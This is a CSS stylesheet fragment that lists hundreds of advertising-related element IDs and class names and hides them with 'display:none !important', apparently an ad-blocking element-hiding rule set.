advert,#textad,#textad3,#textad_block,#the-last-ad-standing,#thefooterad,#themis-ads,#tile-ad,#tmglBannerAd,#tmp2_promo_ad,#toolbarSlideUpAd,#top-ad,#top-ad-container,#top-ad-menu,#top-ads,#top-ads-tabs,#top-advertisement,#top-banner-ad,#top-search-ad-wrapper,#topAd,#topAd728x90,#topAdBanner,#topAdBox,#topAdContainer,#topAdSenseDiv,#topAdcontainer,#topAds,#topAdsContainer,#topAdvBox,#topAdvert,#topAdvert-09,#topBannerAd,#topBannerAdContainer,#topContentAdTeaser,#topNavLeaderboardAdHolder,#topOverallAdArea,#topRightBlockAdSense,#topSponsoredLinks,#top_ad,#top_ad-sense,#top_ad_area,#top_ad_banner,#top_ad_game,#top_ad_unit,#top_ad_wrapper,#top_ad_zone,#top_ads,#top_ads_wrap,#top_advertise,#top_advertising,#top_rectangle_ad,#top_right_ad,#top_wide_ad,#topad,#topad1,#topad2,#topad_left,#topad_right,#topadbar,#topadblock,#topaddwide,#topads,#topadsense,#topadspace,#topadwrap,#topadzone,#topbanner_ad,#topbannerad,#topbar-ad,#topcustomad,#topleaderboardad,#topnav-ad-shell,#topnavad,#toprightAdvert,#toprightad,#topsponsored,#toptextad,#tour300Ad,#tour728Ad,#tourSponsoredLinksContainer,#towerad,#ts-ad_module,#ttp_ad_slot1,#ttp_ad_slot2,#twogamesAd,#txfPageMediaAdvertVideo,#txt_link_ads,#txtads,#undergameAd,#upper-ads,#upperAdvertisementImg,#upperMpu,#upper_small_ad,#upperad,#urban_contentad_1,#urban_contentad_2,#urban_contentad_article,#v_ad,#vap_adsense-top,#vert-ads,#vert_ad,#vert_ad_placeholder,#vertical_ad,#vertical_ads,#videoAd,#videoAdvert,#video_ads_overdiv,#video_advert2,#video_advert3,#video_cnv_ad,#video_overlay_ad,#videoadlogo,#view_ads,#view_ads_advertisements,#viewads,#viewportAds,#viewvid_ad300x250,#wXcds12-ad,#wall_advert,#wallpaper-ad-link,#wallpaperAd_left,#wallpaperAd_right,#walltopad,#weblink_ads_container,#welcomeAdsContainer,#welcome_ad_mrec,#welcome_advertisement,#wf_ContentAd,#wf_FrontSingleAd,#wf_SingleAd,#wf_bottomContentAd,#wgtAd,#whatsnews_top_ad,#whitepaper-ad,#whoisRightAdContainer,#wide_ad_unit_top,#wideskyscraper_160x600_left,#wideskyscraper_160x600_right,#widget_Adverts,#widget_advertisement,#widgetwidget_adserve2,#wrapAdRight,#wrapAdTop,#wrapperAdsTopLeft,#wrapperAdsTopRight,#xColAds,#y-ad-units,#y708-ad-expedia,#y708-ad-lrec,#y708-ad-partners,#y708-ad-ysm,#y708-advertorial-marketplace,#yahoo-ads,#yahoo-sponsors,#yahooSponsored,#yahoo_ads,#yahoo_ads_2010,#yahoo_text_ad,#yahooad-tbl,#yan-sponsored,#yatadsky,#ybf-ads,#yfi_fp_ad_mort,#yfi_fp_ad_nns,#yfi_pf_ad_mort,#ygrp-sponsored-links,#ymap_adbanner,#yn-gmy-ad-lrec,#yreSponsoredLinks,#ysm_ad_iframe,#zoneAdserverMrec,#zoneAdserverSuper,.ADBAR,.ADPod,.AD_ALBUM_ITEMLIST,.AD_MOVIE_ITEM,.AD_MOVIE_ITEMLIST,.AD_MOVIE_ITEMROW,.ADbox,.Ad-300x100,.Ad-Container-976x166,.Ad-Header,.Ad-MPU,.Ad-Wrapper-300x100,.Ad120x600,.Ad160x600,.Ad160x600left,.Ad160x600right,.Ad247x90,.Ad300x,.Ad300x250,.Ad300x250L,.Ad728x90,.AdBorder,.AdBox,.AdBox7,.AdContainerBox308,.AdContainerModule,.AdHeader,.AdHere,.AdInfo,.AdInline,.AdMedium,.AdPlaceHolder,.AdProS728x90Container,.AdProduct,.AdRingtone,.AdSense,.AdSenseLeft,.AdSlot,.AdSpace,.AdTextSmallFont,.AdTitle,.AdUnit,.AdUnit300,.Ad_C,.Ad_D_Wrapper,.Ad_E_Wrapper,.Ad_Right,.AdsBottom,.AdsBoxBottom,.AdsBoxSection,.AdsBoxTop,.AdsLinks1,.AdsLinks2,.AdsRec,.AdvBoxSidebar,.Advert,.Advert300x250,.AdvertMidPage,.AdvertiseWithUs,.Advertisement,.AdvertisementTextTag,.Advman_Widget,.ArticleAd,.ArticleInlineAd,.BCA_Advertisement,.Banner300x250,.BannerAd,.BigBoxAd,.BlockAd,.BlueTxtAdvert,.BottomAdContainer,.BottomAffiliate,.BoxAd,.CG_adkit_leaderboard,.CG_details_ad_dropzone,.CWReviewsProdInfoAd,.ComAread,.CommentAd,.ContentAd,.ContentAds,.DAWRadvertisement,.DeptAd,.DisplayAd,.FT_Ad,.FeaturedAdIndexAd,.FlatAds,.FooterAds,.GOOGLE_AD,.GoogleAd,.GoogleAdSenseBottomModule,.GoogleAdSenseRightModule,.HPG_Ad_B,.HPNewAdsBannerDiv,.HPRoundedAd,.HeaderAds,.HomeContentAd,.IABAdSpace,.InArticleAd,.IndexRightAd,.LazyLoadAd,.LeftAd,.LeftButtonAdSlot,.LeftTowerAd,.M2Advertisement,.MD_adZone,.MOS-ad-hack,.MPUHolder,.MPUTitleWrapperClass,.MREC_ads,.MiddleAd,.MiddleAdContainer,.MiddleAdvert,.NewsAds,.OpaqueAdBanner,.OpenXad,.PU_DoubleClickAdsContent,.Post5ad,.Post8ad,.Post9ad,.RBboxAd,.RW_ad300,.RectangleAd,.RelatedAds,.Right300x250AD,.RightAd1,.RightAdvertiseArea,.RightAdvertisement,.RightGoogleAFC,.RightRailAd,.RightRailTop300x250Ad,.RightSponsoredAdTitle,.RightTowerAd,.STR_AdBlock,.SectionSponsor,.SideAdCol,.SidebarAd,.SidebarAdvert,.SitesGoogleAdsModule,.SkyAdContainer,.SponsoredAdTitle,.SponsoredContent,.SponsoredLinkItemTD,.SponsoredLinks,.SponsoredLinksGrayBox,.SponsoredLinksModule,.SponsoredLinksPadding,.SponsoredLinksPanel,.Sponsored_link,.SquareAd,.StandardAdLeft,.StandardAdRight,.TRU-onsite-ads-leaderboard,.TextAd,.TheEagleGoogleAdSense300x250,.TopAd,.TopAdContainer,.TopAdL,.TopAdR,.TopBannerAd,.UIWashFrame_SidebarAds,.UnderAd,.VerticalAd,.Video-Ad,.VideoAd,.WidgetAdvertiser,.a160x600,.a728x90,.ad-120x60,.ad-120x600,.ad-160,.ad-160x600,.ad-160x600x1,.ad-160x600x2,.ad-160x600x3,.ad-250,.ad-300,.ad-300-block,.ad-300-blog,.ad-300x100,.ad-300x250,.ad-300x250-first,.ad-300x250-right0,.ad-300x600,.ad-350,.ad-355x75,.ad-600,.ad-635x40,.ad-728,.ad-728x90,.ad-728x90-1,.ad-728x90-top0,.ad-728x90_forum,.ad-90x600,.ad-above-header,.ad-adlink-bottom,.ad-adlink-side,.ad-area,.ad-background,.ad-banner,.ad-banner-smaller,.ad-bigsize,.ad-block,.ad-block-square,.ad-blog2biz,.ad-body,.ad-bottom,.ad-box,.ad-break,.ad-btn,.ad-btn-heading,.ad-button,.ad-cell,.ad-column,.ad-container,.ad-container-300x250,.ad-container-728x90,.ad-container-994x282,.ad-context,.ad-disclaimer,.ad-display,.ad-div,.ad-enabled,.ad-feedback,.ad-filler,.ad-flex,.ad-footer,.ad-footer-leaderboard,.ad-forum,.ad-google,.ad-graphic-large,.ad-gray,.ad-grey,.ad-hdr,.ad-head,.ad-header,.ad-heading,.ad-holder,.ad-homeleaderboard,.ad-img,.ad-in-post,.ad-index-main,.ad-inline,.ad-island,.ad-item,.ad-label,.ad-leaderboard,.ad-left,.ad-link,.ad-links,.ad-lrec,.ad-medium,.ad-medium-two,.ad-mpl,.ad-mpu,.ad-msn,.ad-note,.ad-notice,.ad-other,.ad-permalink,.ad-place-active,.ad-placeholder,.ad-postText,.ad-poster,.ad-priority,.ad-rect,.ad-rectangle,.ad-rectangle-text,.ad-related,.ad-rh,.ad-ri,.ad-right,.ad-right-header,.ad-right-txt,.ad-row,.ad-section,.ad-show-label,.ad-side,.ad-sidebar,.ad-sidebar-outer,.ad-sidebar300,.ad-sky,.ad-skyscr,.ad-skyscraper,.ad-slot,.ad-slot-234-60,.ad-slot-300-250,.ad-slot-728-90,.ad-source,.ad-space,.ad-space-mpu-box,.ad-space-topbanner,.ad-spot,.ad-square,.ad-square300,.ad-squares,.ad-statement,.ad-story-inject,.ad-tabs,.ad-text,.ad-text-links,.ad-tile,.ad-title,.ad-top,.ad-top-left,.ad-unit,.ad-unit-300,.ad-unit-300-wrapper,.ad-unit-anchor,.ad-unit-top,.ad-vert,.ad-vertical-container,.ad-vtu,.ad-widget-list,.ad-with-us,.ad-wrap,.ad-wrapper,.ad-zone,.ad-zone-s-q-l,.ad.super,.ad08sky,.ad100,.ad120,.ad120x240backgroundGray,.ad120x600,.ad125,.ad140,.ad160,.ad160600,.ad160x600,.ad160x600GrayBorder,.ad200x60,.ad230,.ad250,.ad250c,.ad300,.ad300250,.ad300_250,.ad300x100,.ad300x250,.ad300x250-hp-features,.ad300x250Module,.ad300x250Top,.ad300x250_container,.ad300x250box,.ad300x50-right,.ad300x600,.ad310,.ad315,.ad336x280,.ad343x290,.ad400right,.ad450,.ad468,.ad468_60,.ad468x60,.ad540x90,.ad600,.ad620x70,.ad626X35,.ad644,.ad728,.ad728_90,.ad728x90,.ad728x90_container,.ad90x780,.adAgate,.adArea674x60,.adBanner,.adBanner300x250,.adBanner728x90,.adBannerTyp1,.adBannerTypSortableList,.adBannerTypW300,.adBar,.adBgBottom,.adBgMId,.adBgTop,.adBlock,.adBottomLink,.adBottomboxright,.adBox,.adBox1,.adBox230X96,.adBox728X90,.adBoxBody,.adBoxBorder,.adBoxContainer,.adBoxContent,.adBoxInBignews,.adBoxSidebar,.adBoxSingle,.adBwrap,.adCMRight,.adCell,.adColumn,.adCont,.adContTop,.adContainer,.adContentAd,.adContour,.adCreative,.adCube,.adDiv,.adElement,.adFender3,.adFrame,.adFtr,.adFullWidthMiddle,.adGoogle,.adHeader,.adHeadline,.adHolder,.adHome300x250,.adHorisontal,.adInNews,.adIsland,.adLabel,.adLeader,.adLeaderForum,.adLeaderboard,.adLeft,.adLoaded,.adLocal,.adMPU,.adMarker,.adMastheadLeft,.adMastheadRight,.adMegaBoard,.adMinisLR,.adMkt2Colw,.adModule,.adModuleAd,.adMpu,.adNewsChannel,.adNoOutline,.adNotice,.adNoticeOut,.adObj,.adPageBorderL,.adPageBorderR,.adPanel,.adPod,.adRect,.adResult,.adRight,.adSKY,.adSelfServiceAdvertiseLink,.adServer,.adSky,.adSky600,.adSkyscaper,.adSkyscraperHolder,.adSlot,.adSpBelow,.adSpace,.adSpacer,.adSplash,.adSponsor,.adSpot,.adSpot-brought,.adSpot-searchAd,.adSpot-textBox,.adSpot-twin,.adSpotIsland,.adSquare,.adSubColPod,.adSummary,.adSuperboard,.adSupertower,.adTD,.adTab,.adTag,.adText,.adTileWrap,.adTiler,.adTitle,.adTopLink,.adTopboxright,.adTout,.adTxt,.adUnit,.adUnitHorz,.adUnitVert,.adUnitVert_noImage,.adWebBoard,.adWidget,.adWithTab,.adWord,.adWrap,.adWrapper,.ad_0,.ad_1,.ad_120x90,.ad_125,.ad_130x90,.ad_160,.ad_160x600,.ad_2,.ad_200,.ad_200x200,.ad_250x250,.ad_250x250_w,.ad_3,.ad_300,.ad_300_250,.ad_300x250,.ad_300x250_box_right,.ad_336,.ad_336x280,.ad_350x100,.ad_350x250,.ad_400x200,.ad_468,.ad_468x60,.ad_600,.ad_680x15,.ad_728,.ad_728_90b,.ad_728x90,.ad_925x90,.ad_Left,.ad_Right,.ad_ad_300,.ad_amazon,.ad_banner,.ad_banner_border,.ad_bar,.ad_bg,.ad_bigbox,.ad_biz,.ad_block,.ad_block_338,.ad_body,.ad_border,.ad_botbanner,.ad_bottom,.ad_bottom_leaderboard,.ad_bottom_left,.ad_box,.ad_box2,.ad_box_ad,.ad_box_div,.ad_callout,.ad_caption,.ad_column,.ad_column_box,.ad_column_hl,.ad_contain,.ad_container,.ad_content,.ad_content_wide,.ad_contents,.ad_descriptor,.ad_disclaimer,.ad_eyebrow,.ad_footer,.ad_frame,.ad_framed,.ad_front_promo,.ad_gutter_top,.ad_head,.ad_header,.ad_heading,.ad_headline,.ad_holder,.ad_hpm,.ad_image,.ad_info_block,.ad_inline,.ad_island,.ad_jnaught,.ad_label,.ad_launchpad,.ad_leader,.ad_leaderboard,.ad_left,.ad_line,.ad_link,.ad_links,.ad_linkunit,.ad_loc,.ad_lrec,.ad_main,.ad_medrec,.ad_medrect,.ad_middle,.ad_mod,.ad_mp,.ad_mpu,.ad_mr,.ad_mrec,.ad_mrec_title_article,.ad_mrect,.ad_news,.ad_note,.ad_notice,.ad_one,.ad_p360,.ad_partner,.ad_partners,.ad_plus,.ad_post,.ad_power,.ad_primary,.ad_promo,.ad_rec,.ad_rectangle,.ad_right,.ad_right_col,.ad_row,.ad_row_bottom_item,.ad_side,.ad_sidebar,.ad_skyscraper,.ad_slug,.ad_slug_table,.ad_space,.ad_space_300_250,.ad_spacer,.ad_sponsor { display:none !important; } .ad_sponsoredsection,.ad_spot_b,.ad_spot_c,.ad_square_r,.ad_square_top,.ad_sub,.ad_tag_middle,.ad_text,.ad_text_w,.ad_title,.ad_top,.ad_top_leaderboard,.ad_top_left,.ad_topright,.ad_tower,.ad_unit,.ad_unit_rail,.ad_url,.ad_warning,.ad_wid300,.ad_wide,.ad_wrap,.ad_wrapper,.ad_wrapper_fixed,.ad_wrapper_top,.ad_wrp,.ad_zone,.adarea,.adarea-long,.adbanner,.adbannerbox,.adbannerright,.adbar,.adboard,.adborder,.adbot,.adbottom,.adbottomright,.adbox-outer,.adbox-wrapper,.adbox_300x600,.adbox_366x280,.adbox_468X60,.adbox_bottom,.adbox_br,.adbox_left,.adboxclass,.adboxesrow,.adbreak,.adbug,.adbutton,.adbuttons,.adcode,.adcol1,.adcol2,.adcolumn,.adcolumn_wrapper,.adcont,.adcopy,.add_300x250,.addiv,.adenquire,.adfieldbg,.adfoot,.adfootbox,.adframe,.adhead,.adhead_h,.adhead_h_wide,.adheader,.adheader100,.adheader416,.adhi,.adhint,.adholder,.adhoriz,.adiframe,.adinfo,.adinside,.adintro,.adits,.adjlink,.adkicker,.adkit,.adkit-advert,.adkit-lb-footer,.adlabel-horz,.adlabel-vert,.adlabelleft,.adlayer,.adleader,.adleaderboard,.adleft1,.adline,.adlink,.adlinks,.adlist,.adlnklst,.admarker,.admediumred,.admedrec,.admessage,.admodule,.admpu,.admpu-small,.adnation-banner,.adnotice,.adops,.adp-AdPrefix,.adpadding,.adpane,.adpic,.adprice,.adproxy,.adrec,.adright,.adroot,.adrotate_widget,.adrow,.adrow-post,.adrow1box1,.adrow1box3,.adrow1box4,.adrule,.ads-125,.ads-300,.ads-300x250,.ads-728x90-wrap,.ads-ads-top,.ads-banner,.ads-below-content,.ads-categories-bsa,.ads-custom,.ads-favicon,.ads-item,.ads-links-general,.ads-mpu,.ads-outer,.ads-profile,.ads-right,.ads-section,.ads-sidebar,.ads-sky,.ads-small,.ads-sponsors,.ads-stripe,.ads-text,.ads-top,.ads-wide,.ads-widget,.ads-widget-partner-gallery,.ads03,.ads160,.ads1_250,.ads24Block,.ads300,.ads460,.ads460_home,.ads468,.ads728,.ads728x90,.adsArea,.adsBelowHeadingNormal,.adsBlock,.adsBottom,.adsBox,.adsCell,.adsCont,.adsDiv,.adsFull,.adsImages,.adsInsideResults_v3,.adsMPU,.adsMiddle,.adsRight,.adsRow,.adsTextHouse,.adsTop,.adsTower2,.adsTowerWrap,.adsWithUs,.ads_125_square,.ads_180,.ads_300,.ads_300x100,.ads_300x250,.ads_320,.ads_337x280,.ads_728x90,.ads_big,.ads_big-half,.ads_box,.ads_box_headline,.ads_brace,.ads_catDiv,.ads_container,.ads_disc_anchor,.ads_disc_leader,.ads_disc_lwr_square,.ads_disc_skyscraper,.ads_disc_square,.ads_div,.ads_footer,.ads_header,.ads_holder,.ads_horizontal,.ads_leaderboard,.ads_lr_wrapper,.ads_medrect,.ads_mpu,.ads_outer,.ads_post_end,.ads_post_end_code,.ads_post_start,.ads_post_start_code,.ads_rectangle,.ads_remove,.ads_right,.ads_rightbar_top,.ads_sc_bl_i,.ads_sc_tb,.ads_sc_tl_i,.ads_show_if,.ads_side,.ads_sidebar,.ads_singlepost,.ads_spacer,.ads_takeover,.ads_title,.ads_top,.ads_top_promo,.ads_tr,.ads_verticalSpace,.ads_vtlLink,.ads_widesky,.ads_wrapperads_top,.adsafp,.adsbg300,.adsblockvert,.adsborder,.adsbottom,.adsbox,.adsboxitem,.adsbttmpg,.adsbyyahoo,.adscaleAdvert,.adscaleP6_canvas,.adsclick,.adscontainer,.adscreen,.adsd_shift100,.adsection_a2,.adsection_c2,.adsense-468,.adsense-ad,.adsense-category,.adsense-category-bottom,.adsense-googleAds,.adsense-heading,.adsense-overlay,.adsense-post,.adsense-right,.adsense-title,.adsense3,.adsense300,.adsenseAds,.adsenseBlock,.adsenseContainer,.adsenseGreenBox,.adsenseInPost,.adsenseList,.adsense_bdc_v2,.adsense_mpu,.adsensebig,.adsenseblock,.adsenseblock_bottom,.adsenseblock_top,.adsenselr,.adsensem_widget,.adsensesq,.adsenvelope,.adserver_zone,.adset,.adsforums,.adsghori,.adsgvert,.adshome,.adside,.adsidebox,.adsider,.adsingle,.adsleft,.adsleftblock,.adslink,.adslogan,.adslotleft,.adslotright,.adsmalltext,.adsmessage,.adsnippet_widget,.adspace,.adspace-MR,.adspace-widget,.adspace180,.adspace_bottom,.adspace_buysell,.adspace_rotate,.adspace_skyscraper,.adspacer,.adspot,.adspot728x90,.adstext,.adstextpad,.adstitle,.adstop,.adstory,.adstrip,.adtab,.adtable,.adtag,.adtech,.adtext,.adtext_gray,.adtext_horizontal,.adtext_onwhite,.adtext_vertical,.adtile,.adtips,.adtips1,.adtitle,.adtop,.adtravel,.adtxt,.adtxtlinks,.adunit,.adv-mpu,.adv-p,.adv-sidebar,.adv300,.advBox,.advSquare,.advVideobox,.adv_120x600,.adv_300x250,.adv_728x90,.adv_banner_hor,.adv_medium_rectangle,.adver,.adverTag,.adverTxt,.adver_cont_below,.advert-300-side,.advert-300x100-side,.advert-728x90,.advert-article-bottom,.advert-bannerad,.advert-bg-250,.advert-bloggrey,.advert-box,.advert-btm,.advert-head,.advert-horizontal,.advert-iab-300-250,.advert-iab-468-60,.advert-mpu,.advert-skyscraper,.advert-text,.advert-title,.advert-txt,.advert120,.advert300,.advert300x250,.advert300x300,.advert300x440,.advert350ih,.advert4,.advert5,.advert728x90,.advert8,.advertColumn,.advertCont,.advertContainer,.advertContent,.advertHeadline,.advertIslandWrapper,.advertRight,.advertSuperBanner,.advertText,.advertTitleSky,.advert_336,.advert_468x60,.advert_box,.advert_cont,.advert_container,.advert_djad,.advert_google_content,.advert_google_title,.advert_home_300,.advert_label,.advert_leaderboard,.advert_list,.advert_note,.advert_surr,.advert_top,.advertheader-red,.advertise,.advertise-here,.advertise-homestrip,.advertise-horz,.advertise-inquiry,.advertise-leaderboard,.advertise-list,.advertise-top,.advertise-vert,.advertiseContainer,.advertiseText,.advertise_ads,.advertise_here,.advertise_link,.advertise_link_sidebar,.advertisement,.advertisement-728x90,.advertisement-block,.advertisement-sidebar,.advertisement-space,.advertisement-sponsor,.advertisement-swimlane,.advertisement-text,.advertisement-top,.advertisement300x250,.advertisement468,.advertisementBox,.advertisementColumnGroup,.advertisementContainer,.advertisementHeader,.advertisementLabel,.advertisementPanel,.advertisementText,.advertisement_300x250,.advertisement_btm,.advertisement_caption,.advertisement_g,.advertisement_header,.advertisement_horizontal,.advertisement_top,.advertisementsOutterDiv,.advertiser,.advertiser-links,.advertisespace_div,.advertising-banner,.advertising-header,.advertising-leaderboard,.advertising-local-links,.advertising2,.advertisingTable,.advertising_block,.advertising_images,.advertisment,.advertisment_bar,.advertisment_caption,.advertisment_two,.advertize,.advertize_here,.advertorial,.advertorial-2,.advertorial-promo-box,.advertorial_red,.advertorialtitle,.adverts,.adverts-125,.adverts_RHS,.advt,.advt-banner-3,.advt-block,.advt-sec,.advt300,.advt720,.advtitle,.adwhitespace,.adwordListings,.adwords,.adwordsHeader,.adwrap,.adwrapper-lrec,.adwrapper948,.adzone-footer,.adzone-sidebar,.affiliate-link,.affiliate-sidebar,.affiliateAdvertText,.affiliates-sidebar,.affinityAdHeader,.afsAdvertising,.after_ad,.agi-adsaleslinks,.alb-content-ad,.alignads,.alt_ad,.anchorAd,.another_text_ad,.answer_ad_content,.aolSponsoredLinks,.aopsadvert,.apiAdMarkerAbove,.apiAds,.app_advertising_skyscraper,.archive-ads,.art_ads,.article-ad-box,.article-ads,.article-content-adwrap,.articleAd,.articleAd300x250,.articleAds,.articleAdsL,.articleEmbeddedAdBox,.article_ad,.article_adbox,.article_mpu_box,.article_page_ads_bottom,.articleads,.aseadn,.aux-ad-widget-1,.aux-ad-widget-2,.b-astro-sponsored-links_horizontal,.b-astro-sponsored-links_vertical,.b_ads_cont,.b_ads_top,.banmanad,.banner-468-60,.banner-468x60,.banner-ad,.banner-ads,.banner-adv,.banner-advert,.banner-adverts,.banner-buysellads,.banner160x600,.banner300by250,.banner300x100,.banner300x250,.banner468,.banner468by60,.banner728x90,.bannerADV,.bannerAd,.bannerAdWrapper300x250,.bannerAdWrapper730x86,.bannerAds,.bannerAdvert,.bannerRightAd,.banner_160x600,.banner_300x250,.banner_728x90,.banner_ad,.banner_ad_footer,.banner_ad_leaderboard,.bannerad,.bannerad-125tower,.bannerad-468x60,.barkerAd,.base-ad-mpu,.base_ad,.base_printer_widgets_AdBreak,.bg-ad-link,.bgnavad,.big-ads,.bigAd,.big_ad,.big_ads,.bigad,.bigad2,.bigbox_ad,.bigboxad,.billboard300x250,.billboard_ad,.biz-ad,.biz-ads,.biz-adtext,.blk_advert,.block-ad,.block-ad300,.block-admanager,.block-ads-bottom,.block-ads-top,.block-adsense,.block-adsense-managed,.block-adspace-full,.block-bg-advertisement-region-1,.block-deca_advertising,.block-google-admanager,.block-google_admanager,.block-openads,.block-openadstream,.block-openx,.block-thirdage-ads,.block-wtg_adtech,.blockAd,.blockAds,.block_ad,.block_ad_floating_bar,.block_ad_sb_text,.block_ad_sb_text2,.block_ad_sponsored_links,.block_ad_sponsored_links-wrapper,.block_ad_sponsored_links_localized,.blockad,.blocked-ads,.blog-ad-leader-inner,.blog-ads-container,.blogAd,.blogAdvertisement,.blogArtAd,.blogBigAd,.blog_ad,.blogads,.blox3featuredAd,.bn_textads,.body_ad,.body_sponsoredresults_bottom,.body_sponsoredresults_middle,.body_sponsoredresults_top,.bodyads,.bodyads2,.bookseller-header-advt,.bottom-ad,.bottom-ad-fr,.bottom-ads,.bottomAd,.bottomAds,.bottom_ad,.bottom_ad_block,.bottom_ads,.bottom_adsense,.bottom_right_ad,.bottomad,.bottomads,.bottomadvert,.bottombarad,.bottomrightrailAd,.bottomvidad,.box-ad,.box-ad-grey,.box-ads,.box-ads-small,.box-adsense,.box-adverts,.boxAd,.boxAds,.boxAdsInclude,.box_ad,.box_ad_container,.box_ad_content,.box_ad_spacer,.box_ad_wrap,.box_ads,.box_adv,.box_adv_new,.box_advertising,.box_advertisment_62_border,.box_content_ad,.box_content_ads,.box_textads,.boxad,.boxads,.boxyads,.bps-ad-wrapper,.bps-advertisement,.bps-advertisement-inline-ads,.br-ad,.breakad_container,.brokerad,.bsa_ads,.btm_ad,.btm_ad_container,.btn-ad,.bullet-sponsored-links,.bullet-sponsored-links-gray,.burstContentAdIndex,.busrep_poll_and_ad_container,.buttonAd,.buttonAds,.button_ads,.button_advert,.buttonadbox,.buttonads,.bx_ad,.bx_ad_right,.cA-adStrap,.cColumn-TextAdsBox,.cLeftTextAdUnit,.c_ligatus_nxn,.calendarAd,.calloutAd,.carbonad,.carbonad-tag,.care2_adspace,.catalog_ads,.category-ad,.categorySponsorAd,.category__big_game_container_body_games_advertising,.cb-ad-banner,.cb-ad-container,.cb_ads,.cb_navigation_ad,.cbstv_ad_label,.cbzadvert,.cbzadvert_block,.cdAdTitle,.cdmainlineSearchAdParent,.cdo-ad-section,.cdsidebarSearchAdParent,.centerAd,.center_ad,.centerad,.centered-ad,.chitikaAdCopy,.cinemabotad,.classifiedAdThree,.clearerad,.cmAdContainer,.cmAdFind,.cmAdSponsoredLinksBox,.cm_ads,.cms-Advert,.cnbc_badge_banner_ad_area,.cnbc_banner_ad_area,.cnbc_leaderboard_ad,.cnn160AdFooter,.cnnAd,.cnnMosaic160Container,.cnnStoreAd,.cnnStoryElementBoxAd,.cnnWCAdBox,.cnnWireAdLtgBox,.cnn_728adbin,.cnn_adcntr300x100,.cnn_adcntr728x90,.cnn_adspc336cntr,.cnn_adtitle,.cntrad,.column2-ad,.columnBoxAd,.columnRightAdvert,.com-ad-server,.comment-ad,.comment-ad-wrap,.comment-advertisement,.comment_ad_box,.common_advertisement_title,.communityAd,.conTSponsored,.conductor_ad,.confirm_ad_left,.confirm_ad_right,.confirm_leader_ad,.consoleAd,.container-adwords,.containerSqAd,.container_serendipity_plugin_google_adsense,.content-ad,.content-ads,.content-advert,.contentAd,.contentAdContainer,.contentAdFoot,.contentAdsWrapper,.content_ad,.content_ad_728,.content_adsense,.content_adsq,.content_tagsAdTech,.contentad,.contentad-home,.contentad300x250,.contentad_right_col,.contentadcontainer,.contentadfloatl,.contentadleft,.contentads,.contentadstartpage,.contents-ads-bottom-left,.contenttextad,.contest_ad,.cp_ad,.cpmstarHeadline,.cpmstarText,.create_ad,.cs-mpu,.cscTextAd,.cse_ads,.cspAd,.ct_ad,.ctnAdSkyscraper,.ctnAdSquare300,.cube-ad,.cubeAd,.cube_ads,.currency_ad,.custom_ads,.cwAdvert,.cxAdvertisement,.darla_ad,.dart-ad,.dartAdImage,.dart_ad,.dart_tag,.dartadvert,.dartiframe,.dc-ad,.dcAdvertHeader,.deckAd,.deckads,.detail-ads,.detailMpu,.detail_ad,.detail_top_advert,.dfrads,.displayAdSlot,.divAd,.divAdright,.div_adv300,.div_advstrip,.divad1,.divad2,.divad3,.divads,.divider_ad,.dlSponsoredLinks,.dmco_advert_iabrighttitle,.downloadAds,.download_ad,.downloadad,.dsq_ad,.dualAds,.dynamic-ads,.dynamic_ad,.e-ad,.ec-ads,.ec-ads-remove-if-empty,.em-ad,.em_ads_box_dynamic_remove,.embed-ad,.embeddedAd,.entry-body-ad,.entry-injected-ad,.entry_sidebar_ads,.entryad,.ez-clientAd,.f_Ads,.feature_ad,.featuredAds,.featured_ad,.featuredadvertising,.fireplaceadleft,.fireplaceadright,.fireplaceadtop,.firstpost_advert_container,.flagads,.flash-advertisement,.flash_ad,.flash_advert,.flashad,.flexiad,.flipbook_v2_sponsor_ad,.floatad,.floated_right_ad,.floatingAds,.fm-badge-ad,.fns_td_wrap,.fold-ads,.footad,.footer-ad,.footer-advert,.footerAd,.footerAdModule,.footerAds,.footerAdslot,.footerAdverts,.footerTextAd,.footer_ad,.footer_ad336,.footer_ads,.footer_block_ad,.footer_bottomad,.footer_line_ad,.footer_text_ad,.footerad,.forumtopad,.freedownload_ads,.frn_adbox,.frn_cont_adbox,.frontads,.frontpage-google-ad,.ft-ad,.ftdAdBar,.ftdContentAd,.full_ad_box,.full_width_ad,.fullbannerad,.g3rtn-ad-site,.gAdRows,.gAdSky,.gAdvertising,.g_ggl_ad,.ga-ads,.ga-textads-bottom,.ga-textads-top,.gaTeaserAds,.gaTeaserAdsBox,.gads_cb,.gads_container,.gallery_ad,.gam_ad_slot,.gameAd,.gamesPage_ad_content,.gbl_advertisement,.gen_side_ad,.gglAds,.global_banner_ad,.googad,.googads,.google-ad,.google-ad-container,.google-ads,.google-ads-boxout,.google-ads-slim,.google-adsense,.google-right-ad,.google-sponsored-ads,.google-sponsored-link,.google468,.google468_60,.googleAd,.googleAd-content,.googleAd-list,.googleAd300x250_wrapper,.googleAdBox,.googleAdSense,.googleAdSenseModule,.googleAd_body,.googleAds,.googleAds_article_page_above_comments,.googleAdsense,.googleContentAds,.googleProfileAd,.googleSearchAd_content,.googleSearchAd_sidebar,.google_ad,.google_ad_wide,.google_add_container,.google_ads,.google_ads_bom_title,.google_ads_content,.google_adsense_footer,.googlead,.googleaddiv,.googleaddiv2,.googleads,.googleads_300x250,.googleads_title,.googleadsense,.googleafc,.googley_ads,.gpAdBox,.gpAds,.gradientAd,.grey-ad-line,.group_ad,.gsAd,.gsfAd,.gt_ad,.gt_ad_300x250,.gt_ad_728x90,.gt_adlabel,.gutter-ad-left,.gutter-ad-right,.gx_ad,.h-ad-728x90-bottom,.h_Ads,.h_ad,.half-ad,.half_ad_box,.hcf-ad,.hcf-ad-rectangle,.hcf-cms-ad,.hd_advert,.hdr-ads,.head_ad,.header-ad,.header-advert,.header-google-ads,.header-taxonomy-image-sponsor,.headerAd,.headerAdCode,.headerAds,.headerAdvert,.headerTextAd,.header_ad,.header_ad_center { display:none !important; } 